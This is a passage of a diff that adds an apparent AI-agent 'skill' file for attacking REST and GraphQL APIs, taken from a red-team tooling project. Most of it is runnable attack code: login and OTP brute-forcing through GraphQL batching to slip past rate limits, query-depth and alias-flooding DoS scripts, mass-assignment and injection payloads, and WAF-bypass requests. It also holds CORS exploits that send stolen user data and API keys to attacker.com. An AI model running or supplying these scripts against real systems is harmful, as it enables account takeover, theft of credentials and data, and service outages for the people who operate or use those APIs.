+  -H "Content-Type: application/json" \
+  -d '{"query": "{ s:__schema { queryType { name } } }"}' | jq .
+
+# Fragment-based introspection bypass
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "fragment f on __Schema { queryType { name } } { ...f }"}' | jq .
+
+# Try deprecated introspection via __typename on specific types
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ users { __typename id email role } }"}' | jq .
+
+# Apollo sandbox — try accessing /_sandbox or /sandbox endpoint
+curl -si https://target.com/_sandbox
+curl -si https://target.com/graphql/sandbox
+curl -si https://target.com/studio
+```
+
+---
+
+### Phase 9: GraphQL — Batching Attacks (Rate Limit Bypass)
+
+#### Step 9.1 — JSON array batching (INTERMEDIATE)
+
+Many GraphQL servers support sending multiple operations in a single HTTP request via JSON arrays. Rate limits often apply per HTTP request, not per operation.
+
+```bash
+# Test if batching is supported
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '[
+    {"query": "{ users { id email } }"},
+    {"query": "{ me { id email } }"}
+  ]' | jq .
+
+# If 200 response with array, batching is enabled
+# Now batch login attempts to bypass per-request rate limits
+python3 - << 'EOF'
+import requests, json
+
+GRAPHQL_URL = "https://target.com/graphql"
+TARGET_EMAIL = "admin@target.com"
+PASSWORDS = open("/opt/SecLists/Passwords/darkweb2017-top100.txt").read().splitlines()
+
+# Batch 100 password attempts per HTTP request
+BATCH_SIZE = 100
+HEADERS = {"Content-Type": "application/json"}
+
+for i in range(0, len(PASSWORDS), BATCH_SIZE):
+    batch = PASSWORDS[i:i+BATCH_SIZE]
+    payload = [
+        {
+            "query": f'mutation {{ login(email: "{TARGET_EMAIL}", password: "{pw}") {{ token user {{ id email }} }} }}'
+        }
+        for pw in batch
+    ]
+    r = requests.post(GRAPHQL_URL, headers=HEADERS, json=payload, timeout=30)
+    responses = r.json()
+    for j, resp in enumerate(responses):
+        if resp.get("data", {}).get("login", {}).get("token"):
+            print(f"[AUTH BYPASS] Password: {batch[j]}")
+            print(f"Token: {resp['data']['login']['token']}")
+            exit()
+    print(f"[*] Batch {i//BATCH_SIZE + 1}: No valid credentials in {len(batch)} attempts")
+EOF
+```
+
+#### Step 9.2 — Alias batching for rate limit bypass (ADVANCED)
+
+When JSON array batching is disabled, aliases can batch multiple operations in one query.
+
+```python
+#!/usr/bin/env python3
+# alias_batching.py — bypass rate limits using GraphQL aliases
+
+import requests
+
+GRAPHQL_URL = "https://target.com/graphql"
+TARGET_EMAIL = "victim@target.com"
+HEADERS = {"Content-Type": "application/json"}
+
+def build_alias_batch(email, passwords):
+    """Build a single query with aliased mutations for each password"""
+    mutations = []
+    for i, password in enumerate(passwords):
+        # Each alias is a separate mutation under one HTTP request
+        mutation = f"""
+        attempt_{i}: login(email: "{email}", password: "{password}") {{
+            token
+            user {{ id email role }}
+        }}"""
+        mutations.append(mutation)
+    query = "mutation {" + "\n".join(mutations) + "}"
+    return query
+
+# Load wordlist
+passwords = open("/opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt").read().splitlines()
+BATCH_SIZE = 50  # 50 attempts per HTTP request
+
+for i in range(0, len(passwords), BATCH_SIZE):
+    batch = passwords[i:i+BATCH_SIZE]
+    query = build_alias_batch(TARGET_EMAIL, batch)
+    r = requests.post(GRAPHQL_URL, headers=HEADERS,
+                      json={"query": query}, timeout=30)
+    data = r.json().get("data", {})
+    for alias, result in data.items():
+        if result and result.get("token"):
+            pw_index = int(alias.split("_")[1])
+            print(f"[SUCCESS] Password: {batch[pw_index]}")
+            print(f"Token: {result['token']}")
+            exit()
+    print(f"[*] Batch {i//BATCH_SIZE + 1}: {len(batch)} attempts, no match")
+```
+
+#### Step 9.3 — OTP/2FA bypass via batching (EXPERT)
+
+```python
+#!/usr/bin/env python3
+# otp_bypass.py — brute-force OTP via GraphQL alias batching
+
+import requests
+
+GRAPHQL_URL = "https://target.com/graphql"
+SESSION_TOKEN = "pre-auth-session-token-after-password"  # Token from step 1
+HEADERS = {"Content-Type": "application/json", "Authorization": f"Bearer {SESSION_TOKEN}"}
+
+# 6-digit OTP: 000000-999999, try all in batches of 100
+def build_otp_batch(start, end):
+    mutations = []
+    for code in range(start, end):
+        otp = f"{code:06d}"
+        mutations.append(f'otp_{code}: verifyOTP(code: "{otp}") {{ token success }}')
+    return "mutation {" + "\n".join(mutations) + "}"
+
+print("[*] Starting OTP brute-force via alias batching...")
+for batch_start in range(0, 1000000, 100):
+    query = build_otp_batch(batch_start, min(batch_start + 100, 1000000))
+    r = requests.post(GRAPHQL_URL, headers=HEADERS,
+                      json={"query": query}, timeout=60)
+    data = r.json().get("data", {})
+    for alias, result in data.items():
+        if result and result.get("token"):
+            otp = alias.replace("otp_", "").zfill(6)
+            print(f"[SUCCESS] Valid OTP: {otp}")
+            print(f"Token: {result['token']}")
+            exit()
+    if batch_start % 10000 == 0:
+        print(f"[*] Progress: {batch_start}/1000000 OTPs tested")
+```
+
+---
+
+### Phase 10: GraphQL — Query Depth DoS
+
+#### Step 10.1 — Nested query DoS (INTERMEDIATE)
+
+```bash
+# Test max query depth (recursive query structures)
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{
+    "query": "{ user { friends { friends { friends { friends { friends { friends { friends { friends { friends { id email } } } } } } } } } } }"
+  }' | jq .
+
+# Generate deeply nested query programmatically
+python3 -c "
+depth = 50
+nested = 'id email' 
+query = 'friends { ' * depth + nested + ' }' * depth
+print('{\"query\": \"{ me { ' + query + ' } }\"}')
+" | curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d @-
+
+# Circular reference DoS
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ users { orders { user { orders { user { orders { id } } } } } } }"}'
+```
+
+#### Step 10.2 — Field duplication / complexity DoS (ADVANCED)
+
+```python
+#!/usr/bin/env python3
+# complexity_dos.py — GraphQL complexity-based resource exhaustion
+
+import requests
+import time
+
+GRAPHQL_URL = "https://target.com/graphql"
+HEADERS = {"Content-Type": "application/json"}
+
+def build_complexity_query(field_count=500):
+    """Build a query requesting same field many times via aliases"""
+    aliases = "\n".join([f"f{i}: users {{ id email name createdAt updatedAt }}" for i in range(field_count)])
+    return f"{{ {aliases} }}"
+
+def build_fragment_bomb():
+    """Fragment-based query amplification"""
+    fragments = ""
+    query_parts = ""
+    for i in range(50):
+        fragments += f"fragment F{i} on Query {{ users {{ id email role }} }}\n"
+        query_parts += f"...F{i}\n"
+    return f"query {{\n{query_parts}}}\n{fragments}"
+
+print("[*] Testing GraphQL complexity DoS...")
+
+# Test 1: Alias flooding
+print("[*] Test 1: Alias flooding (100 aliases)...")
+start = time.time()
+r = requests.post(GRAPHQL_URL, headers=HEADERS,
+                  json={"query": build_complexity_query(100)}, timeout=60)
+elapsed = time.time() - start
+print(f"    Status: {r.status_code}, Time: {elapsed:.2f}s, Size: {len(r.text)} bytes")
+
+# Test 2: Alias flooding (500 aliases)
+print("[*] Test 2: Alias flooding (500 aliases)...")
+start = time.time()
+r = requests.post(GRAPHQL_URL, headers=HEADERS,
+                  json={"query": build_complexity_query(500)}, timeout=120)
+elapsed = time.time() - start
+print(f"    Status: {r.status_code}, Time: {elapsed:.2f}s, Size: {len(r.text)} bytes")
+
+# Test 3: Fragment bomb
+print("[*] Test 3: Fragment bomb...")
+start = time.time()
+r = requests.post(GRAPHQL_URL, headers=HEADERS,
+                  json={"query": build_fragment_bomb()}, timeout=60)
+elapsed = time.time() - start
+print(f"    Status: {r.status_code}, Time: {elapsed:.2f}s, Size: {len(r.text)} bytes")
+```
+
+---
+
+### Phase 11: Common Payloads and Examples
+
+#### REST API Payloads
+
+```json
+// Mass assignment — privilege escalation
+{
+  "username": "attacker",
+  "role": "admin",
+  "isAdmin": true,
+  "permissions": ["read", "write", "admin", "delete"],
+  "plan": "enterprise",
+  "credits": 999999,
+  "isVerified": true,
+  "emailVerified": true,
+  "twoFactorEnabled": false
+}
+
+// BOLA — horizontal privilege escalation
+GET /api/v1/users/[VICTIM_ID]
+GET /api/v1/orders/[VICTIM_ORDER_ID]
+GET /api/v1/documents/[VICTIM_DOC_UUID]
+
+// CORS exploit PoC
+<script>
+fetch('https://target.com/api/v1/users/me', {
+  credentials: 'include',
+  headers: {'Authorization': 'Bearer stored-token'}
+})
+.then(r => r.json())
+.then(d => fetch('https://attacker.com/log?data=' + JSON.stringify(d)));
+</script>
+```
+
+#### GraphQL Payloads
+
+```graphql
+# Basic introspection
+{ __schema { queryType { name } } }
+
+# Type enumeration
+{ __type(name: "User") { fields { name type { name kind } } } }
+
+# Alias batching (rate limit bypass)
+mutation {
+  a1: login(email: "victim@example.com", password: "password1") { token }
+  a2: login(email: "victim@example.com", password: "password2") { token }
+  a3: login(email: "victim@example.com", password: "password3") { token }
+}
+
+# BOLA via GraphQL query
+{ user(id: "VICTIM_UUID") { id email role passwordHash apiKeys { key } } }
+
+# SQL injection via GraphQL argument
+{ users(filter: "1=1 OR 1=1--") { id email } }
+{ users(search: "' OR '1'='1") { id email } }
+
+# NoSQL injection via GraphQL
+{ users(filter: "{\"$gt\": \"\"}") { id email } }
+```
+
+---
+
+### Phase 12: Real-World Engagement Examples
+
+#### Example 1 — E-commerce Platform BOLA (2024)
+
+**Scenario:** B2B SaaS with invoice management. Company A's invoices accessible by Company B.
+
+**Finding path:**
+1. Registered two accounts (Company A and Company B)
+2. Created invoice as Company A — captured UUID: `3f7a1c2d-...`
+3. As Company B, called `GET /api/v2/invoices/3f7a1c2d-...`
+4. Full invoice returned including banking details
+5. Mass enumeration of sequential creation IDs revealed ~50,000 invoices
+
+**Impact:** Full financial data exposure across all customers.
+
+```bash
+# Reproduction
+curl -s https://target.com/api/v2/invoices/3f7a1c2d-8b4e-4f9a-a123-456789abcdef \
+  -H "Authorization: Bearer COMPANY_B_JWT" | jq .
+```
+
+#### Example 2 — GraphQL OTP Bypass Leading to Account Takeover (2024)
+
+**Scenario:** Healthcare app used GraphQL with alias-based OTP verification. OTP was 6-digit numeric.
+
+**Finding path:**
+1. Triggered password reset for victim
+2. Noted GraphQL mutation: `verifyResetOTP(token: String!, otp: String!)`
+3. Rate limit was per HTTP request (max 5 OTPs per minute)
+4. Alias batching sent 1000 OTPs per request — 1M OTPs in ~17 minutes
+5. Account taken over
+
+#### Example 3 — Mass Assignment on SaaS Platform (2023)
+
+**Scenario:** Freemium SaaS — subscription tiers enforced via `plan` field.
+
+**Finding path:**
+1. Registered free account
+2. Used Burp Repeater on `PATCH /api/v1/profile`
+3. Added `"plan": "enterprise"` to normal profile update
+4. Received 200 response — no error
+5. Refreshed dashboard: full enterprise features unlocked
+
+```bash
+curl -s -X PATCH https://target.com/api/v1/profile \
+  -H "Authorization: Bearer FREE_TIER_JWT" \
+  -H "Content-Type: application/json" \
+  -d '{"displayName": "Test", "plan": "enterprise", "seats": 999}'
+```
+
+#### Example 4 — CORS + API Key Exposure
+
+**Scenario:** API reflected `Origin` header without validation and `withCredentials` was set.
+
+**Exploit:**
+```html
+<!-- Hosted on attacker.com — victim visits this page while authenticated -->
+<script>
+var xhr = new XMLHttpRequest();
+xhr.open('GET', 'https://target.com/api/v1/users/me/api-keys', true);
+xhr.withCredentials = true;
+xhr.onload = function() {
+    fetch('https://attacker.com/steal?d=' + encodeURIComponent(xhr.responseText));
+};
+xhr.send();
+</script>
+```
+
+---
+
+### Phase 13: WAF Bypass Techniques
+
+#### GraphQL WAF bypass
+
+```bash
+# Content-Type manipulation
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/graphql" \
+  -d '{ __schema { queryType { name } } }'
+
+# JSON with null bytes
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d "{\"query\":\"{ __schema { queryType { name } } }\"}"
+
+# Unicode normalization bypass
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ __schema { queryType { name } } }"}'
+
+# Case variation (some WAFs are case-sensitive)
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ __SCHEMA { queryType { name } } }"}'
+
+# Whitespace manipulation
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{\n\t__schema\n\t{\n\tqueryType\n\t{\n\tname\n\t}\n\t}\n}"}'
+
+# Comment injection
+curl -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ __sch#comment\nema { queryType { name } } }"}'
+```
+
+#### REST API WAF bypass
+
+```bash
+# Path traversal bypass for BOLA
+curl https://target.com/api/v1/users/1%2f..%2f2  # /1/../2 -> /2
+curl https://target.com/api/v1/users/1/../../v1/users/2
+
+# Parameter pollution
+curl "https://target.com/api/v1/users?id=1&id=2"
+curl -X POST https://target.com/api/v1/users \
+  -d "id=1&id=2"
+
+# JSON encoding bypass
+curl -X POST https://target.com/api/v1/query \
+  -H "Content-Type: application/json" \
+  -d '{"filter": "' OR '1'='1"}'  # Unicode-encoded SQL injection
+
+# Header injection to bypass IP-based rate limits
+curl -X POST https://target.com/api/v1/auth/login \
+  -H "X-Forwarded-For: 127.0.0.1" \
+  -H "X-Real-IP: 127.0.0.1" \
+  -H "X-Originating-IP: 127.0.0.1" \
+  -H "X-Remote-IP: 127.0.0.1" \
+  -d '{"email":"victim@test.com","password":"guess"}'
+
+# Chunked transfer encoding bypass
+curl -X POST https://target.com/api/v1/admin/users \
+  -H "Transfer-Encoding: chunked" \
+  -H "Authorization: Bearer LOW_PRIV_TOKEN" \
+  --data-binary $'5\r\n{"rol\r\n6\r\ne":"ad\r\n5\r\nmin"}\r\n0\r\n\r\n'
+```
+
+---
+
+## 8. Integration with RTExit Autodoc Engine
+
+The RTExit autodoc engine collects structured JSON findings. Use the following output format for all findings discovered with this skill.
+
+### Finding Schema
+
+```json
+{
+  "skill": "rt-exploit-api",
+  "timestamp": "ISO8601",
+  "target": "https://target.com",
+  "finding_id": "API-001",
+  "category": "BOLA|MassAssignment|RateLimit|CORS|GraphQLIntrospection|GraphQLBatching|SchemaExposure|DoS",
+  "severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
+  "owasp_api": "API1:2023|API4:2023|API6:2023|API7:2023|API8:2023",
+  "title": "Human-readable finding title",
+  "description": "Detailed description of the vulnerability",
+  "evidence": {
+    "request": "Full HTTP request string",
+    "response": "Relevant response excerpt",
+    "proof": "Screenshot path or curl command"
+  },
+  "reproduction": ["Step 1", "Step 2", "Step 3"],
+  "impact": "Business impact description",
+  "remediation": "Fix recommendation"
+}
+```
+
+### Autodoc Integration Commands
+
+```bash
+# Save finding to RTExit findings directory
+FINDINGS_DIR="c:/Ahmed/Projects/RTExit/.agents/findings"
+mkdir -p "$FINDINGS_DIR"
+
+# Output finding as JSON
+cat > "$FINDINGS_DIR/API-001-BOLA.json" << 'EOF'
+{
+  "skill": "rt-exploit-api",
+  "timestamp": "2026-05-31T00:00:00Z",
+  "target": "https://target.com",
+  "finding_id": "API-001",
+  "category": "BOLA",
+  "severity": "CRITICAL",
+  "owasp_api": "API1:2023",
+  "title": "Broken Object Level Authorization — User Invoice Exposure",
+  "description": "Any authenticated user can access any invoice by supplying an arbitrary UUID in the invoice ID parameter. No ownership check is enforced server-side.",
+  "evidence": {
+    "request": "GET /api/v2/invoices/3f7a1c2d-8b4e-4f9a-a123-456789abcdef HTTP/1.1\nAuthorization: Bearer COMPANY_B_JWT",
+    "response": "{\"id\":\"3f7a1c2d...\",\"amount\":50000,\"bank_account\":\"...\"}",
+    "proof": "screenshots/API-001-BOLA.png"
+  },
+  "reproduction": [
+    "Authenticate as Company B",
+    "GET /api/v2/invoices/{company_a_invoice_uuid}",
+    "Observe full invoice data returned"
+  ],
+  "impact": "Attacker can exfiltrate all customer invoices, banking details, and PII",
+  "remediation": "Validate invoice ownership against authenticated user's tenant ID before returning data"
+}
+EOF
+
+echo "[+] Finding saved to $FINDINGS_DIR/API-001-BOLA.json"
+```
+
+### Python Autodoc Helper
+
+```python
+#!/usr/bin/env python3
+# autodoc_helper.py — RTExit autodoc integration for rt-exploit-api findings
+
+import json
+import os
+from datetime import datetime, timezone
+
+FINDINGS_DIR = "c:/Ahmed/Projects/RTExit/.agents/findings"
+os.makedirs(FINDINGS_DIR, exist_ok=True)
+
+def save_finding(finding_id, category, severity, title, description,
+                 request, response, reproduction, impact, remediation,
+                 target="https://target.com", owasp_api="API1:2023"):
+    finding = {
+        "skill": "rt-exploit-api",
+        "timestamp": datetime.now(timezone.utc).isoformat(),
+        "target": target,
+        "finding_id": finding_id,
+        "category": category,
+        "severity": severity,
+        "owasp_api": owasp_api,
+        "title": title,
+        "description": description,
+        "evidence": {
+            "request": request,
+            "response": response,
+        },
+        "reproduction": reproduction,
+        "impact": impact,
+        "remediation": remediation
+    }
+    path = os.path.join(FINDINGS_DIR, f"{finding_id}-{category}.json")
+    with open(path, "w") as f:
+        json.dump(finding, f, indent=2)
+    print(f"[AUTODOC] Finding saved: {path}")
+    return path
+
+# Usage example:
+save_finding(
+    finding_id="API-001",
+    category="BOLA",
+    severity="CRITICAL",
+    title="BOLA on /api/v1/users/{id} endpoint",
+    description="User B can access User A's full profile by changing the ID parameter.",
+    request="GET /api/v1/users/42 HTTP/1.1\nAuthorization: Bearer USER_B_TOKEN",
+    response='{"id":42,"email":"userA@target.com","role":"admin"}',
+    reproduction=[
+        "Login as User B and obtain JWT",
+        "Send GET /api/v1/users/42 with User B's JWT",
+        "Observe User A's data returned"
+    ],
+    impact="Full account takeover, PII exposure, privilege escalation",
+    remediation="Validate that the requested user ID matches the authenticated user ID server-side"
+)
+```
+
+---
+
+## 9. Output and Documentation Instructions
+
+### Finding Classification
+
+| Severity | Criteria |
+|---|---|
+| CRITICAL | Account takeover, auth bypass, admin access |
+| HIGH | Cross-user data access, mass assignment to admin |
+| MEDIUM | Information disclosure, rate limit bypass |
+| LOW | CORS without credentials, verbose errors |
+| INFO | Introspection enabled, schema exposure |
+
+### Required Evidence Per Finding
+
+1. Raw HTTP request (curl command or Burp request)
+2. Raw HTTP response (truncated to relevant portion)
+3. Screenshot (if GUI/Burp involved)
+4. Reproduction steps (copy-paste ready)
+5. Business impact statement (1–2 sentences, non-technical)
+
+### Report Naming Convention
+
+```
+API-{NUMBER}-{CATEGORY}-{SEVERITY}.json
+API-001-BOLA-CRITICAL.json
+API-002-MassAssignment-HIGH.json
+API-003-GraphQLIntrospection-MEDIUM.json
+API-004-BatchingRateLimitBypass-HIGH.json
+```
+
+### Burp Suite Session Export
+
+```
+1. Proxy > HTTP history > Filter by target
+2. Right-click relevant requests > Save items
+3. Export as XML: findings/burp-session-{target}-{date}.xml
+4. Annotate each request with finding ID in Burp comments
+```
+
+---
+
+## 10. Resources
+
+### Tools
+
+| Tool | URL | Purpose |
+|---|---|---|
+| graphw00f | https://github.com/dolevf/graphw00f | GraphQL fingerprinting |
+| clairvoyance | https://github.com/nikitastupin/clairvoyance | Schema recovery via field suggestions |
+| kiterunner | https://github.com/assetnote/kiterunner | API route discovery |
+| graphql-cop | https://github.com/dolevf/graphql-cop | GraphQL security audit |
+| graphql-voyager | https://github.com/graphql-kit/graphql-voyager | Schema visualization |
+| Altair GraphQL | https://altairgraphql.dev | GraphQL client with batching support |
+| nuclei | https://github.com/projectdiscovery/nuclei | Template-based API scanning |
+| ffuf | https://github.com/ffuf/ffuf | Web fuzzing framework |
+
+### Wordlists
+
+| Wordlist | URL | Use Case |
+|---|---|---|
+| SecLists API | https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/api | REST endpoint discovery |
+| GraphQL wordlist | https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt | GraphQL field names |
+| Assetnote wordlists | https://wordlists.assetnote.io | API-specific wordlists per tech stack |
+
+### References and Reading
+
+| Resource | URL |
+|---|---|
+| OWASP API Security Top 10 (2023) | https://owasp.org/API-Security/editions/2023/en/0x00-header/ |
+| PortSwigger API Testing Guide | https://portswigger.net/web-security/api-testing |
+| HackTricks GraphQL | https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql |
+| GraphQL Security Research (Escape) | https://escape.tech/blog/ |
+| Nikita Stupin — Schema Recovery | https://nikitastupin.medium.com/graphql-introspection-alternative-82a9a796b30f |
+| PayloadsAllTheThings — GraphQL | https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection |
+| PayloadsAllTheThings — IDOR | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Direct%20Object%20References/README.md |
+| Detectify — Mass Assignment | https://blog.detectify.com/ethical-hacking/mass-assignment-and-related-chained-vulnerabilities/ |
+| PortSwigger — CORS | https://portswigger.net/web-security/cors |
+| GraphQL DoS Research | https://github.com/nicholasess/graphql-dos |
+
+### CVEs and Bug Bounty Reports
+
+- HackerOne Reports tagged `graphql`: https://hackerone.com/hacktivity?querystring=graphql
+- HackerOne Reports tagged `bola`: https://hackerone.com/hacktivity?querystring=bola
+- HackerOne Reports tagged `mass-assignment`: https://hackerone.com/hacktivity?querystring=mass+assignment
+- Bugcrowd University — API Testing: https://www.bugcrowd.com/resources/levelup/introduction-to-testing-apis/